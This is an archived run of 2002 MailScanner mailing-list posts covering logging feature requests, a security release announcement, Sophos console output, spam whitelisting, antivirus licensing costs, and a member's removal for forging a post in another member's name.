okay, this is a bit too much, spoofing other's mail address is definitely _not_ done. (suggestion though, PGP sign your mail.) (another one for matt, when spoofing mail, DO NOT ADD YOUR SIG! heh) On Thu, 2002-09-12 at 20:18, Gerry Doris wrote: > I did NOT send this note! > > This was sent from someone at datawatch.com. It did absolutely NOT come > from me. I can guess who at datawatch.com sent it. > > Why in hell do we put up with this idiot??????????????? > > > Gerry > Doris > > > MessageI agree with Matt! > > I want to know if I'm being heard as well! > > > > Matt Doherty > > IT Dept > > Datawatch Corp > > > >>>In a world without walls or fences, who needs Windows and Gates?<< > > > > -----Original Message----- > > From: Matt Doherty [mailto:Matthew_doherty@datawatch.com] > > Sent: Thursday, September 12, 2002 12:04 PM > > To: MAILSCANNER@JISCMAIL.AC.UK > > Subject: Re: what are you rude?.. heres a copy of what I sent you a > > weekago.try reading it > > > > > > Yeah, So do I. > > I think the people of this list deserve to know what he added from > > their > > suggestions. Don't you think? If your standing in line to get in a > > concert, arn't you wondering if your going to get in - in time to not > > miss the beginning of a show. > > Dont talk to me about money - I have done over 170,000 dollars of > > work > > for nothing over 5 years and I am still polite to the people I do it > > for. That doesn't matter anyways. I asked a question politely towards > > this list probably 17 times and only got 15 of them answered.. Meanwhile > > off the subject questions get answered. > > But I'm not rude about it either. I think the people in this list > > deserve > > a better respons than that. I think we all wanted to know what he > > considered and what he didn't. Otherwise we may think twice about > > answering him next time. I spent 10 minutes trying to think of some good > > suggestions only to get a response stating "SUch As"? > > I STATED 2 SUCH AS examples. That shows me how carefully read these > > posts > > are in here. The public helped get this program where it is today. Dont > > get an ego over it. > > > > Matt Doherty > > IT Dept > > Datawatch Corp > > > > >>In a world without walls or fences, who needs Windows and Gates?<< > > > > -----Original Message----- > > From: Steve Evans [mailto:sevans@FOUNDATION.SDSU.EDU] > > Sent: Thursday, September 12, 2002 11:50 AM > > To: MAILSCANNER@JISCMAIL.AC.UK > > Subject: Re: what are you rude?.. heres a copy of what I sent you a > > week > > ago.try reading it > > > > > > Normally I leave arrogant posts like this alone, because I find it's > > a > > waste of time to teach people manners in a forum like this. But . . . > > > > If you want someone to complain to, yell at, rip apart, be rude to, > > etc > > I've included a list of commercial anti-virus companies that will gladly > > put up with that for a few thousand+ dollars. > > > > http://www.nai.com/ > > http://www.trendmicro.com/ > > http://www.sophos.com/ > > > > Meanwhile if you plan on staying on this list, most of us don't like > > to > > see Julian assaulted with attitudes like this. He's saving me in the > > neighborhood of $20,000, and that's not even counting the reduced labor > > I have to spend on his product compared to the big boy's products, and I > > come from a small shop. I can't imagine what he's saving other people > > in money. And here's the kicker, he works for FREE. > > > > > > Steve Evans > > (619) 594-0653 > > > > -----Original Message----- > > From: Matt Doherty [mailto:Matthew_doherty@DATAWATCH.COM] > > Sent: Thursday, September 12, 2002 7:40 AM > > To: MAILSCANNER@JISCMAIL.AC.UK > > Subject: what are you rude?.. heres a copy of what I sent you a > > week > > ago. try reading it > > > > > > such as > > > > > > Matt Doherty > > IT Dept > > Datawatch Corp > > > > >>In a world without walls or fences, who needs Windows and > > Gates?<< > > > > -----Original Message----- > > From: Matt Doherty [mailto:Matthew_doherty@datawatch.com] > > Sent: Monday, September 09, 2002 4:34 PM > > To: MailScanner mailing list > > Subject: RE: New release logging suggestions > > > > > > I would like to see some differant text in the log per email virus > > caught.. I grep the maillog to see how many viruses caught so far that > > week. For instance, I currently tried 'tail -2000 /var/log/maillog | > > grep > >>>>Virus' of course the ">" symbols something that messes grep up and > >>>> wont > > work. The only string that works best is just use the word Virus ( tail > > -2000 /var/log/maillog | grep Virus ) Only thing is, it shows the > > mailscanner restarting every four hours lines as well as the viruses > > caught. I cant think of anything good but maybe some weird character > > that is never seen in the maillog such as a & or pipe symbol? Just > > something that grep could sniff out easily ONLY for caught viruses. Or > > do you have a better solution? The Email ID to go along with it as well > > would be nice. for ones that were scanned and ones that were found to be > > infected. > > Hope that is a ok suggestion.. > > Oh well Im still a newbie anyways 8-) > > > > Matt Doherty > > IT Dept > > Datawatch Corp > > > > >>In a world without walls or fences, who needs Windows and > > Gates?<< > > > > -----Original Message----- > > From: Julian Field [mailto:mailscanner@ECS.SOTON.AC.UK] > > Sent: Monday, September 09, 2002 5:14 PM > > To: MAILSCANNER@JISCMAIL.AC.UK > > Subject: New release logging suggestions > > > > > > The new release is getting there... > > > > What logging would people like to see? > > Anything particular that you want logged? > > > > Suggestions please. > > -- > > Julian Field Teaching Systems Manager > > jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. > > 023 8059 2817 University of Southampton > > Southampton SO17 1BJ > > > Gerry > -- Tal Kelrich PGP Fingerprint: 3EDF FCC5 60BB 4729 AB2F CAE6 FEC1 9AAC 12B9 AA69 PGP key-id: 12B9AA69 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 240 bytes Desc: This is a digitally signed message part Url : http://lists.mailscanner.info/pipermail/mailscanner/attachments/20020912/ec8c0974/attachment.bin From erich at OLYPEN.COM Thu Sep 12 20:07:48 2002 From: erich at OLYPEN.COM (Eric H) Date: Thu Jan 12 21:15:36 2006 Subject: what's this VC noise? Message-ID: Can anyone tell me why noise like this appears on the virtual console where I started mailscanner? It doesn't appear to be actually waiting for the ([Y]es/[N]o/[A]ll). # Proceed with disinfection of ./g8C3OFpc026394/periodd.com ([Y]es/[N]o/[A]ll) ?Proceed with disinfection of ./g8C3RHpc026605/talent.com ([Y]es/[N]o/[A]ll) ?Proceed with disinfection of ./g8C3bSpc027353/continue.com ([Y]es/[N]o/[A]ll) ? # Premature padding of base64 data at /usr/local/lib/perl5/site_perl/5.8.0/MIME/Decoder/Base64.pm line 109. Eric From mailscanner at ecs.soton.ac.uk Thu Sep 12 19:18:39 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:36 2006 Subject: what are you rude?.. heres a copy of what I sent you a weekago.try reading it In-Reply-To: <1734.64.10.121.84.1031851096.squirrel@tiger.dorfam.ca> References: Message-ID: <5.1.0.14.2.20020912190955.023117c0@imap.ecs.soton.ac.uk> Matt Doherty has been removed from the list for forging a posting pretending to be someone else. He might want to hope that Gerry doesn't have good lawyers, or else he might find himself in trouble for fraudulently publishing information purporting to be from an innocent 3rd party. The messages posted to this list are archived on a publicly accessible web site, and therefore posting to this list is the same as publishing all information contained in the messages. I am all in favour of reasonable free speech, but I will not condone forgery. Now let us consider this matter dealt with, and let us all get back to discussing MailScanner and all being civil to each other. I am very disappointed by Mr Doherty's behaviour, and I sincerely hope we won't see anything like it again. Jules. At 18:18 12/09/2002, you wrote: >I did NOT send this note! > >This was sent from someone at datawatch.com. It did absolutely NOT come >from me. I can guess who at datawatch.com sent it. > >Why in hell do we put up with this idiot??????????????? > > >Gerry >Doris > > > MessageI agree with Matt! > > I want to know if I'm being heard as well! > > > > Matt Doherty > > IT Dept > > Datawatch Corp > > > >>>In a world without walls or fences, who needs Windows and Gates?<< > > > > -----Original Message----- > > From: Matt Doherty [mailto:Matthew_doherty@datawatch.com] > > Sent: Thursday, September 12, 2002 12:04 PM > > To: MAILSCANNER@JISCMAIL.AC.UK > > Subject: Re: what are you rude?.. heres a copy of what I sent you a > > weekago.try reading it > > > > > > Yeah, So do I. > > I think the people of this list deserve to know what he added from > > their > > suggestions. Don't you think? If your standing in line to get in a > > concert, arn't you wondering if your going to get in - in time to not > > miss the beginning of a show. > > Dont talk to me about money - I have done over 170,000 dollars of > > work > > for nothing over 5 years and I am still polite to the people I do it > > for. That doesn't matter anyways. I asked a question politely towards > > this list probably 17 times and only got 15 of them answered.. Meanwhile > > off the subject questions get answered. > > But I'm not rude about it either. I think the people in this list > > deserve > > a better respons than that. I think we all wanted to know what he > > considered and what he didn't. Otherwise we may think twice about > > answering him next time. I spent 10 minutes trying to think of some good > > suggestions only to get a response stating "SUch As"? > > I STATED 2 SUCH AS examples. That shows me how carefully read these > > posts > > are in here. The public helped get this program where it is today. Dont > > get an ego over it. > > > > Matt Doherty > > IT Dept > > Datawatch Corp > > > > >>In a world without walls or fences, who needs Windows and Gates?<< > > > > -----Original Message----- > > From: Steve Evans [mailto:sevans@FOUNDATION.SDSU.EDU] > > Sent: Thursday, September 12, 2002 11:50 AM > > To: MAILSCANNER@JISCMAIL.AC.UK > > Subject: Re: what are you rude?.. heres a copy of what I sent you a > > week > > ago.try reading it > > > > > > Normally I leave arrogant posts like this alone, because I find it's > > a > > waste of time to teach people manners in a forum like this. But . . . > > > > If you want someone to complain to, yell at, rip apart, be rude to, > > etc > > I've included a list of commercial anti-virus companies that will gladly > > put up with that for a few thousand+ dollars. > > > > http://www.nai.com/ > > http://www.trendmicro.com/ > > http://www.sophos.com/ > > > > Meanwhile if you plan on staying on this list, most of us don't like > > to > > see Julian assaulted with attitudes like this. He's saving me in the > > neighborhood of $20,000, and that's not even counting the reduced labor > > I have to spend on his product compared to the big boy's products, and I > > come from a small shop. I can't imagine what he's saving other people > > in money. And here's the kicker, he works for FREE. > > > > > > Steve Evans > > (619) 594-0653 > > > > -----Original Message----- > > From: Matt Doherty [mailto:Matthew_doherty@DATAWATCH.COM] > > Sent: Thursday, September 12, 2002 7:40 AM > > To: MAILSCANNER@JISCMAIL.AC.UK > > Subject: what are you rude?.. heres a copy of what I sent you a > > week > > ago. try reading it > > > > > > such as > > > > > > Matt Doherty > > IT Dept > > Datawatch Corp > > > > >>In a world without walls or fences, who needs Windows and > > Gates?<< > > > > -----Original Message----- > > From: Matt Doherty [mailto:Matthew_doherty@datawatch.com] > > Sent: Monday, September 09, 2002 4:34 PM > > To: MailScanner mailing list > > Subject: RE: New release logging suggestions > > > > > > I would like to see some differant text in the log per email virus > > caught.. I grep the maillog to see how many viruses caught so far that > > week. For instance, I currently tried 'tail -2000 /var/log/maillog | > > grep > >>>>Virus' of course the ">" symbols something that messes grep up and > >>>> wont > > work. The only string that works best is just use the word Virus ( tail > > -2000 /var/log/maillog | grep Virus ) Only thing is, it shows the > > mailscanner restarting every four hours lines as well as the viruses > > caught. I cant think of anything good but maybe some weird character > > that is never seen in the maillog such as a & or pipe symbol? Just > > something that grep could sniff out easily ONLY for caught viruses. Or > > do you have a better solution? The Email ID to go along with it as well > > would be nice. for ones that were scanned and ones that were found to be > > infected. > > Hope that is a ok suggestion.. > > Oh well Im still a newbie anyways 8-) > > > > Matt Doherty > > IT Dept > > Datawatch Corp > > > > >>In a world without walls or fences, who needs Windows and > > Gates?<< > > > > -----Original Message----- > > From: Julian Field [mailto:mailscanner@ECS.SOTON.AC.UK] > > Sent: Monday, September 09, 2002 5:14 PM > > To: MAILSCANNER@JISCMAIL.AC.UK > > Subject: New release logging suggestions > > > > > > The new release is getting there... > > > > What logging would people like to see? > > Anything particular that you want logged? > > > > Suggestions please. > > -- > > Julian Field Teaching Systems Manager > > jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. > > 023 8059 2817 University of Southampton > > Southampton SO17 1BJ > > >Gerry -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Thu Sep 12 22:45:49 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:36 2006 Subject: ANNOUNCE: Security release 3.22-14 Message-ID: <5.1.0.14.2.20020912223652.022cb290@imap.ecs.soton.ac.uk> I have just released version 3.22-14. This is a security release, and addresses the problem recently highlighted on the Bugtraq involving fragmented or partial messages. This type of message can be easily created by Microsoft Outlook Express, and can be used to bypass many e-mail scanning systems. Many thanks to Tal Kelrich for bringing this to my attention! RPM Users ======== If you use the RPM distribution, just apply the new RPM and the 2 parts of the fix will be automatically installed for you. Tar Users ======= If you use the tar distribution, please note that there is a new patch file "mime-tools-patch2.txt" which must also be applied to the MIME-tools module version 5.411. This is separate from the "mime-tools-patch.txt" previously released. Please read the file docs/install/perl.shtml for links to these patches. If you don't know how to apply patches, please read the documentation supplied with the "patch" command. As an example, if you are in the right directory in your Perl distribution (usually below the "site_perl" directory) then the command patch -p0 < mime-tools-patch2.txt is similar to the command you will need. If you still need more help applying patches, then I suggest you ask a source of Unix assistance, as I cannot afford to help you all with this. In the end of the day, patch files are only plain text files and you can apply the changes by hand with a text editor. You can download the new versions, as usual, from www.mailscanner.info -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Thu Sep 12 22:52:25 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:37 2006 Subject: what's this VC noise? In-Reply-To: Message-ID: <5.1.0.14.2.20020912225048.0242d298@imap.ecs.soton.ac.uk> At 20:07 12/09/2002, you wrote: >Can anyone tell me why noise like this appears on the virtual console >where I started mailscanner? It doesn't appear to be actually waiting for >the ([Y]es/[N]o/[A]ll). It's noise from Sophos. I've tried stopping it, but it looks like they output to /dev/tty or somewhere like that, which is pretty difficult to stop happening. ># Proceed with disinfection of >./g8C3OFpc026394/periodd.com ([Y]es/[N]o/[A]ll) ?Proceed with disinfection >of ./g8C3RHpc026605/talent.com ([Y]es/[N]o/[A]ll) ?Proceed with >disinfection of ./g8C3bSpc027353/continue.com ([Y]es/[N]o/[A]ll) ? -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Thu Sep 12 22:49:52 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:37 2006 Subject: logging In-Reply-To: Message-ID: <5.1.0.14.2.20020912224819.0230ef68@imap.ecs.soton.ac.uk> At 18:48 12/09/2002, you wrote: >I understand that #5 would result in a large amount of data being >generated in log files however the problem that I am attempting to solve >is that the mailarchive function uses a *huge* amount of space when >enabled. In the end I am looking to generate per user, per domain and >summary statistics from this type of log. I can see where the TO field >may end up as a fairly long string. I understand if it seems impractical. Would your problem be solved by being able to archive different users' and different domains' mail in separate directories, where you could then just scan those directories themselves to produce reports on their contents? Would this be more useful than very verbose logs? >5. entries that could be used to create email usage reports. For each >email to have To, From, Subject, Date, bytes, and names of any attachments >would allow for easier creation of user reports. > >Is there a limit on the length of a log entry? These would be *very* long. > >-----Original Message----- >From: Julian Field [mailto:mailscanner@ECS.SOTON.AC.UK] >Sent: Thursday, September 12, 2002 9:33 AM >To: MAILSCANNER@JISCMAIL.AC.UK >Subject: Re: logging > >Ok, here are all the responses: > >1. From <$1> To <$2> virus <$3> > >Impossible to generically extract the name of the virus, so this would >have to include the whole virus report. > >2. something that grep could sniff out easily ONLY for caught viruses. Or >do you have a better solution? The Email ID to go along with it as well >would be nice. for ones that were scanned and ones that were found to be >infected > >Such as? > >3. I would definately like the virus name reported by the virus engine > >See (1) > >4. making the logging as machine freindly as possible > >I will do what I can. > >5. entries that could be used to create email usage reports. For each >email to have To, From, Subject, Date, bytes, and names of any attachments >would allow for easier creation of user reports. > >Is there a limit on the length of a log entry? These would be *very* long. > >6. Identifiable tag >When you get a chance would you consider altering the logging code for >matches on filename rules to have an identifiable tag. E.g. instead of >logging: >"Executable file in filename.exe" and "Possible MS-Dos shortcut attack >in filename.pif" >Log: >"Filename Rules: Executable file in filename.exe" and "Filename rules: >Possible MS-Dos shortcut attack in filename.pif" > >Definite good idea. > >Any more thoughts from anyone? >-- >Julian Field Teaching Systems Manager >jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science >Tel. 023 8059 2817 University of Southampton > Southampton SO17 1BJ -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.mailscanner.info/pipermail/mailscanner/attachments/20020912/66e4296d/attachment.html From LISTSERV at JISCMAIL.AC.UK Thu Sep 12 20:40:40 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:37 2006 Subject: MAILSCANNER: bcc5226@TDCADSL.DK left the list Message-ID: <200209121940.UAA12711@magpie.ecs.soton.ac.uk> Thu, 12 Sep 2002 20:40:40 Poul Kristensen has just signed off the MAILSCANNER list (MailScanner mailing list). ------------------------- Original mail header -------------------------- Return-Path: Received: from 130.246.192.52 by JISCMAIL.AC.UK (SMTPL release 1.0f) with TCP; Thu, 12 Sep 2002 20:40:40 +0100 Received: from pfepa.post.tele.dk (pfepa.post.tele.dk [193.162.153.2]) by ori.rl.ac.uk (8.11.1/8.11.1) with ESMTP id g8CJeZr17832 for ; Thu, 12 Sep 2002 20:40:35 +0100 Received: from [192.168.0.100] (0x503ed119.virnxx8.adsl-dhcp.tele.dk [80.62.209.25]) by pfepa.post.tele.dk (Postfix) with ESMTP id 32B60481752 for ; Thu, 12 Sep 2002 21:40:35 +0200 (CEST) Subject: From: Poul Kristensen To: listserv@jiscmail.ac.uk Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.8 Date: 12 Sep 2002 21:45:03 +0200 Message-Id: <1031859904.2631.12.camel@localhost.localdomain> Mime-Version: 1.0 From jim at ENTROPHY-FREE.NET Thu Sep 12 23:32:25 2002 From: jim at ENTROPHY-FREE.NET (Jim Levie) Date: Thu Jan 12 21:15:37 2006 Subject: logging In-Reply-To: <5.1.0.14.2.20020912224819.0230ef68@imap.ecs.soton.ac.uk> References: <5.1.0.14.2.20020912224819.0230ef68@imap.ecs.soton.ac.uk> Message-ID: <1031869945.20266.19.camel@chaos.entrophy-free.net> On Thu, 2002-09-12 at 16:49, Julian Field wrote: > At 18:48 12/09/2002, you wrote: > >I understand that #5 would result in a large amount of data being > >generated in log files however the problem that I am attempting to solve > >is that the mailarchive function uses a *huge* amount of space when > >enabled. In the end I am looking to generate per user, per domain and > >summary statistics from this type of log. I can see where the TO field > >may end up as a fairly long string. I understand if it seems impractical. > > Would your problem be solved by being able to archive different users' and > different domains' mail in separate directories, where you could then just > scan those directories themselves to produce reports on their contents? > > Would this be more useful than very verbose logs? > > >5. entries that could be used to create email usage reports. For each > >email to have To, From, Subject, Date, bytes, and names of any attachments > >would allow for easier creation of user reports. > > > >Is there a limit on the length of a log entry? These would be *very* long. If that sort of information was going to be logged, and I'm not sure if that is something that MailScanner ought to be doing, it would seem to me that it would make more sense to push the data into a file or a DB. Syslog isn't very flexible in its logging format and we are talking about a big growth in the log files. Seems to me that if it were going into a separate log file or a DB the results would be easier to parse and the maillog would remain more reasonable. The downside of that kind of additional logging is that it is going to slow down MailScanner and the code will be larger and more complex. -- The instructions said to use Windows 98 or better, so I installed RedHat. From erich at OLYPEN.COM Fri Sep 13 00:02:45 2002 From: erich at OLYPEN.COM (Eric H) Date: Thu Jan 12 21:15:37 2006 Subject: what's this VC noise? In-Reply-To: <5.1.0.14.2.20020912225048.0242d298@imap.ecs.soton.ac.uk> Message-ID: On Thu, 12 Sep 2002, Julian Field wrote: > It's noise from Sophos. I've tried stopping it, but it looks like they > output to /dev/tty or somewhere like that, which is pretty difficult to > stop happening. OK, that's harmless then. So far, I like Sophos. It seems to work well and installation was easy. But I doubt my boss is willing to pay the kind of money the Sophos people were talking about when I called them about licensing yesterday. Is it possible to use on Open-Source scanner like ClamAV and the openantivirus.org database? It seems I heard somewhere that someone had gotten mailscanner and clamav to work together. Regards, Eric From hciss at HCIWS.COM Fri Sep 13 01:23:46 2002 From: hciss at HCIWS.COM (Matt) Date: Thu Jan 12 21:15:37 2006 Subject: ANNOUNCE: Security release 3.22-14 References: <5.1.0.14.2.20020912223652.022cb290@imap.ecs.soton.ac.uk> Message-ID: <002d01c25abb$d6324c80$6701a8c0@matthew> > I have just released version 3.22-14. Does this have any of the new 'spam bounce' features you spoke of? Any idea when you might release them? Thanks Matt From billa at STERLING.NET Fri Sep 13 02:56:30 2002 From: billa at STERLING.NET (Bill Anderson) Date: Thu Jan 12 21:15:37 2006 Subject: Selective spam filtering? Message-ID: I am currently using mailscanner with spamassassin and sendmail. I am only using the spam feature to filter spam for specific domains that are hosted on other mail servers. Can I only spam filter for certain addresses in the domain, while letting everything else through? someone@somedomain.com gets filtered *@somedomain.com no filtering Is this possible with my config? ======================= Bill Anderson Sterling Communications (503)885-8908 x225 bill@sterlink.net ======================= Sterling Support (503)885-8908 x223 support@sterling.net http://www.sterling.net ======================= For network status and outage information, please see: http://www.sterling.net/support_networkstatus.asp From smohan at VSNL.COM Fri Sep 13 03:05:31 2002 From: smohan at VSNL.COM (S Mohan) Date: Thu Jan 12 21:15:37 2006 Subject: Feature request In-Reply-To: <5.1.0.14.2.20020911110650.02449de8@imap.ecs.soton.ac.uk> Message-ID: <000701c25aca$0f6e84b0$01000001@mohans> In the feature requests, many have listed detailed logging suggestions. Is it possible have an offline log analyser that aggregates data in a specific format like anteater does for smtp? This would be a great boon. I know it can be extracted from the logs. Not being a programmer is handicap here. Is it possible for someone to write a log analyser based on the logs of v3 or v4 please? Mohan From raxie at BULACAN.PH Fri Sep 13 03:13:33 2002 From: raxie at BULACAN.PH (Ruel C. Bristol) Date: Thu Jan 12 21:15:37 2006 Subject: what's this VC noise? Message-ID: Edit sweep.pl and add "-nc" on the DisinfectionOptions of sophos. This will invert the default setting of sophos to ask for confirmation before disinfecting/deleting. Raxie On Thu, 12 Sep 2002, Julian Field wrote: > At 20:07 12/09/2002, you wrote: > >Can anyone tell me why noise like this appears on the virtual console > >where I started mailscanner? It doesn't appear to be actually waiting for > >the ([Y]es/[N]o/[A]ll). > > It's noise from Sophos. I've tried stopping it, but it looks like they > output to /dev/tty or somewhere like that, which is pretty difficult to > stop happening. > > ># Proceed with disinfection of > >./g8C3OFpc026394/periodd.com ([Y]es/[N]o/[A]ll) ?Proceed with disinfection > >of ./g8C3RHpc026605/talent.com ([Y]es/[N]o/[A]ll) ?Proceed with > >disinfection of ./g8C3bSpc027353/continue.com ([Y]es/[N]o/[A]ll) ? > > -- > Julian Field Teaching Systems Manager > jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science > Tel. 023 8059 2817 University of Southampton > Southampton SO17 1BJ > -- - ( o o ) - -------oOOo----(_)----oOOo------- Ruel C. Bristol -=Raxie=- Systems Administrator Bulacan Info Tech http://www.bulacan.ph raxie@bulacan.ph --------------------------------- From smohan at VSNL.COM Fri Sep 13 05:03:57 2002 From: smohan at VSNL.COM (S Mohan) Date: Thu Jan 12 21:15:37 2006 Subject: logging In-Reply-To: <1031848991.15297.36.camel@localhost.localdomain> Message-ID: Is it possible to log which scanner found the virus if multiple scanners are being used in sequence. This is one way of knowing whether the first scanner is good or not. Either helps replace scanner or change the order to make the system more efficient. Mohan -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On Behalf Of Robert A. Thompson Sent: 12 September 2002 22:13 To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: logging This will work, however when I did this in amavis (before switching to mailscanner) I found it was not 100% accurate. Which is what I think Julian ment. This would get lots of them, however mcafee gets a wild hair sometimes and words things different on some viruses(this is often the case on Trojans, and new viruses where you use the extra.dat file till they release the official dat file). However, I would be willing to accept this method and deal with the few inaccuracies, and I would be happy with the "Found the yaha virus" messages for the report line also. Using a lot of unix tools (grep, awk, sort, uniq) I can still print very usable results for turning into other agencies on what we are seeing from either method. --Robert On Thu, 2002-09-12 at 12:32, Hamish Marson wrote: > Julian Field wrote: > > > Ok, here are all the responses: > > > > *1. From <$1> To <$2> virus <$3> > > > > *Impossible to generically extract the name of the virus, so this > > would have to include the whole virus report. > > > Why do you say this? I run amavisd-new (Because I run postfix), and it > manages to extract the name of (ALL) the virii caught in a mail message. > And logs them. > > Admittedly it's separate code for each virus engine. But then it's > separate code to call them anyway, because they're all differemt... > > > e.g. for NAI > > # > # McAfee > # > > if ($uvscan ne "") { > $output = `$uvscan $uvscan_args $TEMPDIR/parts`; > $errval = ($? >> 8); > do_log(2,$output); > if ($errval != 0) { > if ($errval == $uvscan_exitcode) { > my $loutput = $output; > $loutput =~ s/Found: (.+) NOT a/Found the $1/g; > $loutput =~ s/Found the (.+) trojan/Found the $1 > virus/g; > $loutput =~ s/Found virus or variant (.+) /Found > the $1 virus/g; > @virusname = ($loutput =~ /Found the (.+) virus/g); > do_virus($output); > } else { > do_log(0,"Virus scanner failure: $uvscan (error > code: $errval)"); > } > } > } > > > > And @virusname holds the names of all the virii caught... > > > -- > > I don't suffer from Insanity... | Linux User #16396 > I enjoy every minute of it... | > | > http://www.travellingkiwi.com/ | From smohan at VSNL.COM Fri Sep 13 05:30:54 2002 From: smohan at VSNL.COM (S Mohan) Date: Thu Jan 12 21:15:37 2006 Subject: No subject Message-ID: We have had a few threads on this and recently someone was talking of Sophos being expensive. Sophos licences SAVI for use. I believe we need to licence out as many users of SAVI as mailbags or email ids for which mail is scanned. They do not seem to have a server licence for a command line version. F-Prot seems to be selling a server licence at $300. Can some one throw light on the licence and cost implications of various scanners when used in conjunction with MailScanner please? Mohan From danieltan at shopnsave.com.sg Fri Sep 13 05:38:44 2002 From: danieltan at shopnsave.com.sg (Daniel Tan) Date: Thu Jan 12 21:15:37 2006 Subject: No subject References: Message-ID: <017601c25adf$74f957a0$3900a8c0@Daniel> sophos is chargin around US$750 for just the sophos anti-virus from a local company in my country..with 10 licenses which i don't need...likewise everyone only needs the server license... ----- Original Message ----- From: "S Mohan" To: Sent: Friday, September 13, 2002 12:30 PM We have had a few threads on this and recently someone was talking of Sophos being expensive. Sophos licences SAVI for use. I believe we need to licence out as many users of SAVI as mailbags or email ids for which mail is scanned. They do not seem to have a server licence for a command line version. F-Prot seems to be selling a server licence at $300. Can some one throw light on the licence and cost implications of various scanners when used in conjunction with MailScanner please? Mohan From smohan at VSNL.COM Fri Sep 13 06:02:27 2002 From: smohan at VSNL.COM (S Mohan) Date: Thu Jan 12 21:15:37 2006 Subject: No subject In-Reply-To: <017601c25adf$74f957a0$3900a8c0@Daniel> Message-ID: There must be something wrong. In India, 10U SAVI cots US $220 equiv. Mohan -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On Behalf Of Daniel Tan Sent: 13 September 2002 10:09 To: MAILSCANNER@JISCMAIL.AC.UK Subject: sophos is chargin around US$750 for just the sophos anti-virus from a local company in my country..with 10 licenses which i don't need...likewise everyone only needs the server license... ----- Original Message ----- From: "S Mohan" To: Sent: Friday, September 13, 2002 12:30 PM We have had a few threads on this and recently someone was talking of Sophos being expensive. Sophos licences SAVI for use. I believe we need to licence out as many users of SAVI as mailbags or email ids for which mail is scanned. They do not seem to have a server licence for a command line version. F-Prot seems to be selling a server licence at $300. Can some one throw light on the licence and cost implications of various scanners when used in conjunction with MailScanner please? Mohan From LISTSERV at JISCMAIL.AC.UK Fri Sep 13 06:28:15 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:37 2006 Subject: MAILSCANNER: pollitt@MAPTEK.COM.AU requested to join Message-ID: <200209130528.GAA27691@magpie.ecs.soton.ac.uk> Fri, 13 Sep 2002 06:28:15 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from Simon Pollitt . The following subscription options have been requested: SUBJECTHDR. You can, at your discretion, send the following command to LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER pollitt@MAPTEK.COM.AU Simon Pollitt The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+pollitt%40MAPTEK.COM.AU+Simon+Pollitt&L=MAILSCANNER This first link will add the subscriber to the list. You can then set the subscription options with this link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=SET+MAILSCANNER+SUBJECTHDR+FOR+pollitt%40MAPTEK.COM.AU&L=MAILSCANNER ------------------------- Original mail header -------------------------- [Request submitted through anonymous TCP/IP interface from 127.0.0.1] From mailscanner at ecs.soton.ac.uk Fri Sep 13 08:11:39 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:37 2006 Subject: Selective spam filtering? In-Reply-To: Message-ID: <5.1.0.14.2.20020913081115.04a9cb50@imap.ecs.soton.ac.uk> At 02:56 13/09/2002, you wrote: >I am currently using mailscanner with spamassassin and sendmail. I am only >using the spam feature to filter spam for specific domains that are hosted >on other mail servers. Can I only spam filter for certain addresses in the >domain, while letting everything else through? > >someone@somedomain.com gets filtered >*@somedomain.com no filtering > >Is this possible with my config? Yes, the spam whitelist lets you do exactly this. Take a look at the sample supplied spam.whitelist.conf file. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Fri Sep 13 08:12:47 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:37 2006 Subject: what's this VC noise? In-Reply-To: Message-ID: <5.1.0.14.2.20020913081216.02e224d0@imap.ecs.soton.ac.uk> At 03:13 13/09/2002, you wrote: >Edit sweep.pl and add "-nc" on the DisinfectionOptions of sophos. This >will invert the default setting of sophos to ask for confirmation before >disinfecting/deleting. Note that MailScanner provides the "A" answer in response to the question automatically already, so it won't be sitting waiting for a keypress. >Raxie > > > >On Thu, 12 Sep 2002, Julian Field wrote: > > > At 20:07 12/09/2002, you wrote: > > >Can anyone tell me why noise like this appears on the virtual console > > >where I started mailscanner? It doesn't appear to be actually waiting for > > >the ([Y]es/[N]o/[A]ll). > > > > It's noise from Sophos. I've tried stopping it, but it looks like they > > output to 